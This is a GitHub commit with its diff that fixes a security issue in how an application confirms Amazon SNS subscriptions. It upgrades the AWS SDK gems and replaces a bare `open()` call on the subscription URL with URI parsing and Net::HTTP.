SECURITY: Improve validation of SNS subscription confirm (#14671)

SECURITY: Improve validation of SNS subscription confirm (#14671)

An upstream validation bug in the aws-sdk-sns library could enable RCE under certain circumstances. This commit updates the upstream gem, and adds additional validation to provide defense-in-depth.

diff --git a/Gemfile.lock b/Gemfile.lock
index 8c013d0..0e75936 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -53,8 +53,8 @@ GEM
       rake (>= 10.4, < 14.0)
     ast (2.4.2)
     aws-eventstream (1.2.0)
-    aws-partitions (1.432.0)
-    aws-sdk-core (3.112.1)
+    aws-partitions (1.516.0)
+    aws-sdk-core (3.121.2)
       aws-eventstream (~> 1, >= 1.0.2)
       aws-partitions (~> 1, >= 1.239.0)
       aws-sigv4 (~> 1.1)
@@ -66,10 +66,10 @@ GEM
       aws-sdk-core (~> 3, >= 3.112.0)
       aws-sdk-kms (~> 1)
       aws-sigv4 (~> 1.1)
-    aws-sdk-sns (1.38.0)
-      aws-sdk-core (~> 3, >= 3.112.0)
+    aws-sdk-sns (1.46.0)
+      aws-sdk-core (~> 3, >= 3.121.2)
       aws-sigv4 (~> 1.1)
-    aws-sigv4 (1.2.3)
+    aws-sigv4 (1.4.0)
       aws-eventstream (~> 1, >= 1.0.2)
     barber (0.12.2)
       ember-source (>= 1.0, < 3.1)
diff --git a/app/jobs/regular/confirm_sns_subscription.rb b/app/jobs/regular/confirm_sns_subscription.rb
index 0737470..f68588f 100644
--- a/app/jobs/regular/confirm_sns_subscription.rb
+++ b/app/jobs/regular/confirm_sns_subscription.rb
@@ -13,8 +13,13 @@ module Jobs
       require "aws-sdk-sns"
       return unless Aws::SNS::MessageVerifier.new.authentic?(raw)
 
-      # confirm subscription by visiting the URL
-      open(subscribe_url)
+      uri = begin
+        URI.parse(subscribe_url)
+      rescue URI::Error
+        return
+      end
+
+      Net::HTTP.get(uri)
     end
 
   end

GitHub sha: 010309d1084d5ac54d9f62eefa7ef100721fd1c8

This commit appears in #14671 which was approved by danielwaterworth. It was merged by davidtaylorhq.